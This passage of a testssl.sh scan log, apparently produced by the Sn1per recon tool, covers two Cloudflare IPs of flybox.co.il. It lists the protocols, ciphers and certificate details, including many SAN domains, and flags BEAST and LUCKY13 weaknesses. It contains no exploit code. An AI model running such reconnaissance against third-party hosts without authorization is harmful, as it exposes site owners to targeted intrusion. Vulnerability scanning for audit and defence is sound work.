DNS:techxpertsllc.com, DNS:vbrs.co.uk, DNS:wholesaleonline114.tk, DNS:wholesaleonline4.tk, DNS:wholesaleonline55.tk, DNS:wittcatt.stream
  2766. Issuer: COMODO ECC Domain Validation Secure Server CA 2
  2767.  
  2768. Not valid before: Dec 17 00:00:00 2017 GMT
  2769. Not valid after: Jun 25 23:59:59 2018 GMT
  2770. 
  2771. ###########################################################
  2772. testssl 2.9dev from https://testssl.sh/dev/
  2773. 
  2774. This program is free software. Distribution and
  2775. modification under GPLv2 permitted.
  2776. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
  2777.  
  2778. Please file bugs @ https://testssl.sh/bugs/
  2779. 
  2780. ###########################################################
  2781.  
  2782. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
  2783. on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
  2784. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
  2785.  
  2786.  
  2787. Testing all IPv4 addresses (port 443): 104.31.75.239 104.31.74.239
  2788. -----------------------------------------------------
  2789.  Start 2017-12-31 05:20:05 -->> 104.31.75.239:443 (flybox.co.il) <<--
  2790.  
  2791. further IP addresses: 104.31.74.239 2400:cb00:2048:1::681f:4bef
  2792. 2400:cb00:2048:1::681f:4aef
  2793. rDNS (104.31.75.239): --
  2794. Service detected: HTTP
  2795.  
  2796.  
  2797.  Testing protocols via sockets except SPDY+HTTP2 
  2798.  
  2799.  SSLv2 not offered (OK)
  2800.  SSLv3 not offered (OK)
  2801.  TLS 1 offered
  2802.  TLS 1.1 offered
  2803.  TLS 1.2 offered (OK)
  2804.  TLS 1.3 offered (OK): draft 18
  2805.  SPDY/NPN h2, spdy/3.1, http/1.1 (advertised)
  2806.  HTTP2/ALPN h2, spdy/3.1, http/1.1 (offered)
  2807.  
  2808.  Testing ~standard cipher categories 
  2809.  
  2810.  NULL ciphers (no encryption) not offered (OK)
  2811.  Anonymous NULL Ciphers (no authentication) not offered (OK)
  2812.  Export ciphers (w/o ADH+NULL) not offered (OK)
  2813.  LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
  2814.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
  2815.  Triple DES Ciphers (Medium) not offered (OK)
  2816.  High encryption (AES+Camellia, no AEAD) offered (OK)
  2817.  Strong encryption (AEAD ciphers) offered (OK)
  2818.  
  2819.  
  2820.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
  2821.  
  2822.  PFS is offered (OK) TLS13-AES-256-GCM-SHA384
  2823. TLS13-CHACHA20-POLY1305-SHA256
  2824. ECDHE-ECDSA-CHACHA20-POLY1305-OLD
  2825. ECDHE-ECDSA-AES256-GCM-SHA384
  2826. ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
  2827. ECDHE-ECDSA-CHACHA20-POLY1305
  2828. TLS13-AES-128-GCM-SHA256
  2829. ECDHE-ECDSA-AES128-GCM-SHA256
  2830. ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
  2831.  Elliptic curves offered: secp224r1 prime256v1 secp384r1 secp521r1 X25519
  2832.  
  2833.  
  2834.  Testing server preferences 
  2835.  
  2836.  Has server cipher order? yes (OK)
  2837.  Negotiated protocol TLSv1.3
  2838.  Negotiated cipher TLS13-AES-256-GCM-SHA384, 253 bit ECDH (X25519)
  2839.  Cipher order
  2840. TLSv1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
  2841. TLSv1.1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
  2842. TLSv1.2: ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
  2843. ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA
  2844. ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES256-GCM-SHA384
  2845. ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
  2846. TLSv1.3: TLS13-AES-256-GCM-SHA384 TLS13-CHACHA20-POLY1305-SHA256
  2847. TLS13-AES-128-GCM-SHA256
  2848.  
  2849.  
  2850.  Testing server defaults (Server Hello) 
  2851.  
  2852.  TLS extensions (standard) "renegotiation info/#65281" "server name/#0"
  2853. "session ticket/#35" "status request/#5"
  2854. "next protocol/#13172" "EC point formats/#11"
  2855. "extended master secret/#23"
  2856. "signed certificate timestamps/#18"
  2857. "application layer protocol negotiation/#16"
  2858.  Session Ticket RFC 5077 hint 64800 seconds, session tickets keys seems to be rotated < daily
  2859.  SSL Session ID support yes
  2860.  Session Resumption Tickets: yes, ID: yes
  2861.  TLS clock skew -1 sec from localtime
  2862.  Signature Algorithm ECDSA with SHA256
  2863.  Server key size ECDSA 256 bits
  2864.  Fingerprint / Serial SHA1 241F2CD8DFACDEAEB1AEB7104A94653708701987 / 4B78D31156C5EC99DAF67C53B1FDAC49
  2865. SHA256 39F0EFA4589C2C3EE02214DE224E9EF7BAED9F31A533D05A131ED458E82F53EE
  2866.  Common Name (CN) sni165065.cloudflaressl.com (request w/o SNI didn't succeed, usual for EC certificates)
  2867.  subjectAltName (SAN) sni165065.cloudflaressl.com *.aonlineorder.tk
  2868. *.bestproductthisyear.tk *.bigsale135store.tk
  2869. *.bigsale171store.tk *.bigsale215store.tk
  2870. *.bigsale248store.tk *.bigsale281store.tk
  2871. *.bjfhiu.tk *.bsmartbuyer.tk
  2872. *.bsmartonlineshop.tk *.btokoonlinemurah.tk
  2873. *.budgettrouwfilm.nl *.dbranded.tk
  2874. *.eawesomemarket.tk *.emmom.tk *.flybox.co.il
  2875. *.fmarketplus.tk *.ftopbuy.tk *.h1xv9oacp.ga
  2876. *.ialliexpress.tk *.iowist.com *.ipaytoko.tk
  2877. *.iperfectmarket.tk *.ismartxpress.tk
  2878. *.jsmartonlineshop.tk *.jtopcharts.tk
  2879. *.lalliexpress.tk *.lpayperclick.tk
  2880. *.lpremiumonlineshop.tk *.onlinekanyakumari.com
  2881. *.osmartbuyer.tk *.pawesomemarket.tk
  2882. *.pbelimudah.tk *.rlinkaliexpress.tk
  2883. *.rnesaliexpress.tk *.samriddle.website
  2884. *.snapcracka.us *.stokoonlinemurah.tk *.taeaj.tk
  2885. *.techxpertsllc.com *.vbrs.co.uk
  2886. *.wholesaleonline114.tk *.wholesaleonline4.tk
  2887. *.wholesaleonline55.tk *.wittcatt.stream
  2888. aonlineorder.tk bestproductthisyear.tk
  2889. bigsale135store.tk bigsale171store.tk
  2890. bigsale215store.tk bigsale248store.tk
  2891. bigsale281store.tk bjfhiu.tk bsmartbuyer.tk
  2892. bsmartonlineshop.tk btokoonlinemurah.tk
  2893. budgettrouwfilm.nl dbranded.tk eawesomemarket.tk
  2894. emmom.tk flybox.co.il fmarketplus.tk ftopbuy.tk
  2895. h1xv9oacp.ga ialliexpress.tk iowist.com
  2896. ipaytoko.tk iperfectmarket.tk ismartxpress.tk
  2897. jsmartonlineshop.tk jtopcharts.tk lalliexpress.tk
  2898. lpayperclick.tk lpremiumonlineshop.tk
  2899. onlinekanyakumari.com osmartbuyer.tk
  2900. pawesomemarket.tk pbelimudah.tk
  2901. rlinkaliexpress.tk rnesaliexpress.tk
  2902. samriddle.website snapcracka.us
  2903. stokoonlinemurah.tk taeaj.tk techxpertsllc.com
  2904. vbrs.co.uk wholesaleonline114.tk
  2905. wholesaleonline4.tk wholesaleonline55.tk
  2906. wittcatt.stream 
  2907.  Issuer COMODO ECC Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
  2908.  Trust (hostname) Ok via SAN (SNI mandatory)
  2909.  Chain of trust Ok 
  2910.  EV cert (experimental) no
  2911.  Certificate Expiration 176 >= 60 days (2017-12-16 19:00 --> 2018-06-25 19:59 -0400)
  2912.  # of certificates provided 3
  2913.  Certificate Revocation List http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
  2914.  OCSP URI http://ocsp.comodoca4.com
  2915.  OCSP stapling offered
  2916.  OCSP must staple no
  2917.  DNS CAA RR (experimental) not offered
  2918.  Certificate Transparency yes (TLS extension)
  2919.  
  2920.  
  2921.  Testing HTTP header response @ "/" 
  2922.  
  2923.  HTTP Status Code  301 Moved Permanently, redirecting to "https://www.flybox.co.il/"
  2924.  HTTP clock skew 0 sec from localtime
  2925.  Strict Transport Security --
  2926.  Public Key Pinning --
  2927.  Server banner cloudflare
  2928.  Application banner X-Powered-By(B: PHP/7(B.0(B.1(B3(B
  2929.  Cookie(s) 3 issued: NONE secure, 1/3 HttpOnly -- maybe better try target URL of 30x
  2930.  Security headers --
  2931.  Reverse Proxy banner --
  2932.  
  2933.  
  2934.  Testing vulnerabilities 
  2935.  
  2936.  Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
  2937.  CCS (CVE-2014-0224) not vulnerable (OK)
  2938.  Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), no session tickets
  2939.  ROBOT Server does not support any cipher suites that use RSA key transport
  2940.  Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
  2941.  Secure Client-Initiated Renegotiation not vulnerable (OK)
  2942.  CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
  2943.  BREACH (CVE-2013-3587) no HTTP compression (OK)  - only supplied "/" tested
  2944.  POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
  2945.  TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
  2946.  SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
  2947.  FREAK (CVE-2015-0204) not vulnerable (OK)
  2948.  DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
  2949. no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
  2950.  LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
  2951.  BEAST (CVE-2011-3389) TLS1: ECDHE-ECDSA-AES128-SHA
  2952. ECDHE-ECDSA-AES256-SHA 
  2953. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
  2954.  LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
  2955.  RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
  2956.  
  2957.  
  2958.  Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
  2959.  
  2960. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
  2961. -----------------------------------------------------------------------------------------------------------------------------
  2962. x1302 TLS13-AES-256-GCM-SHA384 ECDH 253 AESGCM 256 TLS_AES_256_GCM_SHA384
  2963. xcc14 ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH 256 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
  2964. xc02c ECDHE-ECDSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
  2965. xc024 ECDHE-ECDSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
  2966. xc00a ECDHE-ECDSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
  2967. xcca9 ECDHE-ECDSA-CHACHA20-POLY1305 ECDH 253 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
  2968. x1301 TLS13-AES-128-GCM-SHA256 ECDH 253 AESGCM 128 TLS_AES_128_GCM_SHA256
  2969. xc02b ECDHE-ECDSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
  2970. xc023 ECDHE-ECDSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
  2971. xc009 ECDHE-ECDSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
  2972.  
  2973.  
  2974.  Running client simulations via sockets 
  2975.  
  2976. Android 2.3.7 No connection
  2977. Android 4.1.1 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2978. Android 4.3 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2979. Android 4.4.2 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2980. Android 5.0.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  2981. Android 6.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  2982. Android 7.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, 253 bit ECDH (X25519)
  2983. Chrome 51 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  2984. Chrome 57 Win 7 TLSv1.3 TLS13-AES-128-GCM-SHA256, 253 bit ECDH (X25519)
  2985. Firefox 49 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2986. Firefox 53 Win 7 TLSv1.3 TLS13-AES-128-GCM-SHA256, 253 bit ECDH (X25519)
  2987. IE 6 XP No connection
  2988. IE 7 Vista TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2989. IE 8 XP No connection
  2990. IE 8 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2991. IE 11 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2992. IE 11 Win 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2993. IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2994. IE 11 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2995. Edge 13 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2996. Edge 13 Win Phone 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  2997. Opera 17 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2998. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  2999. Safari 7 iOS 7.1 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  3000. Safari 9 OS X 10.11 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3001. Safari 10 OS X 10.12 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3002. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3003. Tor 17.0.9 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  3004. Java 6u45 No connection
  3005. Java 7u25 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  3006. Java 8u31 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3007. OpenSSL 1.0.1l TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3008. OpenSSL 1.0.2e TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3009.  
  3010.  Done 2017-12-31 05:24:09 [ 247s] -->> 104.31.75.239:443 (flybox.co.il) <<--
  3011.  
  3012. -----------------------------------------------------
  3013.  Start 2017-12-31 05:24:09 -->> 104.31.74.239:443 (flybox.co.il) <<--
  3014.  
  3015. further IP addresses: 104.31.75.239 2400:cb00:2048:1::681f:4bef
  3016. 2400:cb00:2048:1::681f:4aef
  3017. rDNS (104.31.74.239): --
  3018. Service detected: HTTP
  3019.  
  3020.  
  3021.  Testing protocols via sockets except SPDY+HTTP2 
  3022.  
  3023.  SSLv2 not offered (OK)
  3024.  SSLv3 not offered (OK)
  3025.  TLS 1 offered
  3026.  TLS 1.1 offered
  3027.  TLS 1.2 offered (OK)
  3028.  TLS 1.3 offered (OK): draft 18
  3029.  SPDY/NPN h2, spdy/3.1, http/1.1 (advertised)
  3030.  HTTP2/ALPN h2, spdy/3.1, http/1.1 (offered)
  3031.  
  3032.  Testing ~standard cipher categories 
  3033.  
  3034.  NULL ciphers (no encryption) not offered (OK)
  3035.  Anonymous NULL Ciphers (no authentication) not offered (OK)
  3036.  Export ciphers (w/o ADH+NULL) not offered (OK)
  3037.  LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
  3038.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
  3039.  Triple DES Ciphers (Medium) not offered (OK)
  3040.  High encryption (AES+Camellia, no AEAD) offered (OK)
  3041.  Strong encryption (AEAD ciphers) offered (OK)
  3042.  
  3043.  
  3044.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
  3045.  
  3046.  PFS is offered (OK) TLS13-AES-256-GCM-SHA384
  3047. TLS13-CHACHA20-POLY1305-SHA256
  3048. ECDHE-ECDSA-CHACHA20-POLY1305-OLD
  3049. ECDHE-ECDSA-AES256-GCM-SHA384
  3050. ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
  3051. ECDHE-ECDSA-CHACHA20-POLY1305
  3052. TLS13-AES-128-GCM-SHA256
  3053. ECDHE-ECDSA-AES128-GCM-SHA256
  3054. ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
  3055.  Elliptic curves offered: secp224r1 prime256v1 secp384r1 secp521r1 X25519
  3056.  
  3057.  
  3058.  Testing server preferences 
  3059.  
  3060.  Has server cipher order? yes (OK)
  3061.  Negotiated protocol TLSv1.3
  3062.  Negotiated cipher TLS13-AES-256-GCM-SHA384, 253 bit ECDH (X25519)
  3063.  Cipher order
  3064. TLSv1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
  3065. TLSv1.1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
  3066. TLSv1.2: ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
  3067. ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA
  3068. ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES256-GCM-SHA384
  3069. ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
  3070. TLSv1.3: TLS13-AES-256-GCM-SHA384 TLS13-CHACHA20-POLY1305-SHA256
  3071. TLS13-AES-128-GCM-SHA256
  3072.  
  3073.  
  3074.  Testing server defaults (Server Hello) 
  3075.  
  3076.  TLS extensions (standard) "renegotiation info/#65281" "server name/#0"
  3077. "session ticket/#35" "status request/#5"
  3078. "next protocol/#13172" "EC point formats/#11"
  3079. "extended master secret/#23"
  3080. "signed certificate timestamps/#18"
  3081. "application layer protocol negotiation/#16"
  3082.  Session Ticket RFC 5077 hint 64800 seconds, session tickets keys seems to be rotated < daily
  3083.  SSL Session ID support yes
  3084.  Session Resumption Tickets: yes, ID: yes
  3085.  TLS clock skew -1 sec from localtime
  3086.  Signature Algorithm ECDSA with SHA256
  3087.  Server key size ECDSA 256 bits
  3088.  Fingerprint / Serial SHA1 241F2CD8DFACDEAEB1AEB7104A94653708701987 / 4B78D31156C5EC99DAF67C53B1FDAC49
  3089. SHA256 39F0EFA4589C2C3EE02214DE224E9EF7BAED9F31A533D05A131ED458E82F53EE
  3090.  Common Name (CN) sni165065.cloudflaressl.com (request w/o SNI didn't succeed, usual for EC certificates)
  3091.  subjectAltName (SAN) sni165065.cloudflaressl.com *.aonlineorder.tk
  3092. *.bestproductthisyear.tk *.bigsale135store.tk
  3093. *.bigsale171store.tk *.bigsale215store.tk
  3094. *.bigsale248store.tk *.bigsale281store.tk
  3095. *.bjfhiu.tk *.bsmartbuyer.tk
  3096. *.bsmartonlineshop.tk *.btokoonlinemurah.tk
  3097. *.budgettrouwfilm.nl *.dbranded.tk
  3098. *.eawesomemarket.tk *.emmom.tk *.flybox.co.il
  3099. *.fmarketplus.tk *.ftopbuy.tk *.h1xv9oacp.ga
  3100. *.ialliexpress.tk *.iowist.com *.ipaytoko.tk
  3101. *.iperfectmarket.tk *.ismartxpress.tk
  3102. *.jsmartonlineshop.tk *.jtopcharts.tk
  3103. *.lalliexpress.tk *.lpayperclick.tk
  3104. *.lpremiumonlineshop.tk *.onlinekanyakumari.com
  3105. *.osmartbuyer.tk *.pawesomemarket.tk
  3106. *.pbelimudah.tk *.rlinkaliexpress.tk
  3107. *.rnesaliexpress.tk *.samriddle.website
  3108. *.snapcracka.us *.stokoonlinemurah.tk *.taeaj.tk
  3109. *.techxpertsllc.com *.vbrs.co.uk
  3110. *.wholesaleonline114.tk *.wholesaleonline4.tk
  3111. *.wholesaleonline55.tk *.wittcatt.stream
  3112. aonlineorder.tk bestproductthisyear.tk
  3113. bigsale135store.tk bigsale171store.tk
  3114. bigsale215store.tk bigsale248store.tk
  3115. bigsale281store.tk bjfhiu.tk bsmartbuyer.tk
  3116. bsmartonlineshop.tk btokoonlinemurah.tk
  3117. budgettrouwfilm.nl dbranded.tk eawesomemarket.tk
  3118. emmom.tk flybox.co.il fmarketplus.tk ftopbuy.tk
  3119. h1xv9oacp.ga ialliexpress.tk iowist.com
  3120. ipaytoko.tk iperfectmarket.tk ismartxpress.tk
  3121. jsmartonlineshop.tk jtopcharts.tk lalliexpress.tk
  3122. lpayperclick.tk lpremiumonlineshop.tk
  3123. onlinekanyakumari.com osmartbuyer.tk
  3124. pawesomemarket.tk pbelimudah.tk
  3125. rlinkaliexpress.tk rnesaliexpress.tk
  3126. samriddle.website snapcracka.us
  3127. stokoonlinemurah.tk taeaj.tk techxpertsllc.com
  3128. vbrs.co.uk wholesaleonline114.tk
  3129. wholesaleonline4.tk wholesaleonline55.tk
  3130. wittcatt.stream 
  3131.  Issuer COMODO ECC Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
  3132.  Trust (hostname) Ok via SAN (SNI mandatory)
  3133.  Chain of trust Ok 
  3134.  EV cert (experimental) no
  3135.  Certificate Expiration 176 >= 60 days (2017-12-16 19:00 --> 2018-06-25 19:59 -0400)
  3136.  # of certificates provided 3
  3137.  Certificate Revocation List http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
  3138.  OCSP URI http://ocsp.comodoca4.com
  3139.  OCSP stapling offered
  3140.  OCSP must staple no
  3141.  DNS CAA RR (experimental) not offered
  3142.  Certificate Transparency yes (TLS extension)
  3143.  
  3144.  
  3145.  Testing HTTP header response @ "/" 
  3146.  
  3147.  HTTP Status Code  301 Moved Permanently, redirecting to "https://www.flybox.co.il/"
  3148.  HTTP clock skew 0 sec from localtime
  3149.  Strict Transport Security --
  3150.  Public Key Pinning --
  3151.  Server banner cloudflare
  3152.  Application banner X-Powered-By(B: PHP/7(B.0(B.1(B3(B
  3153.  Cookie(s) 3 issued: NONE secure, 1/3 HttpOnly -- maybe better try target URL of 30x
  3154.  Security headers --
  3155.  Reverse Proxy banner --
  3156.  
  3157.  
  3158.  Testing vulnerabilities 
  3159.  
  3160.  Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
  3161.  CCS (CVE-2014-0224) not vulnerable (OK)
  3162.  Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), no session tickets
  3163.  ROBOT Server does not support any cipher suites that use RSA key transport
  3164.  Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
  3165.  Secure Client-Initiated Renegotiation not vulnerable (OK)
  3166.  CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
  3167.  BREACH (CVE-2013-3587) no HTTP compression (OK)  - only supplied "/" tested
  3168.  POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
  3169.  TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
  3170.  SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
  3171.  FREAK (CVE-2015-0204) not vulnerable (OK)
  3172.  DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
  3173. no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
  3174.  LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
  3175.  BEAST (CVE-2011-3389) TLS1: ECDHE-ECDSA-AES128-SHA
  3176. ECDHE-ECDSA-AES256-SHA 
  3177. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
  3178.  LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
  3179.  RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
  3180.  
  3181.  
  3182.  Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
  3183.  
  3184. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
  3185. -----------------------------------------------------------------------------------------------------------------------------
  3186. x1302 TLS13-AES-256-GCM-SHA384 ECDH 253 AESGCM 256 TLS_AES_256_GCM_SHA384
  3187. xcc14 ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH 256 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
  3188. xc02c ECDHE-ECDSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
  3189. xc024 ECDHE-ECDSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
  3190. xc00a ECDHE-ECDSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
  3191. xcca9 ECDHE-ECDSA-CHACHA20-POLY1305 ECDH 253 ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
  3192. x1301 TLS13-AES-128-GCM-SHA256 ECDH 253 AESGCM 128 TLS_AES_128_GCM_SHA256
  3193. xc02b ECDHE-ECDSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
  3194. xc023 ECDHE-ECDSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
  3195. xc009 ECDHE-ECDSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
  3196.  
  3197.  
  3198.  Running client simulations via sockets 
  3199.  
  3200. Android 2.3.7 No connection
  3201. Android 4.1.1 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  3202. Android 4.3 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  3203. Android 4.4.2 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3204. Android 5.0.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  3205. Android 6.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  3206. Android 7.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, 253 bit ECDH (X25519)
  3207. Chrome 51 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  3208. Chrome 57 Win 7 TLSv1.3 TLS13-AES-128-GCM-SHA256, 253 bit ECDH (X25519)
  3209. Firefox 49 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3210. Firefox 53 Win 7 TLSv1.3 TLS13-AES-128-GCM-SHA256, 253 bit ECDH (X25519)
  3211. IE 6 XP No connection
  3212. IE 7 Vista TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  3213. IE 8 XP No connection
  3214. IE 8 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  3215. IE 11 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3216. IE 11 Win 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3217. IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3218. IE 11 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3219. Edge 13 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3220. Edge 13 Win Phone 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3221. Opera 17 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
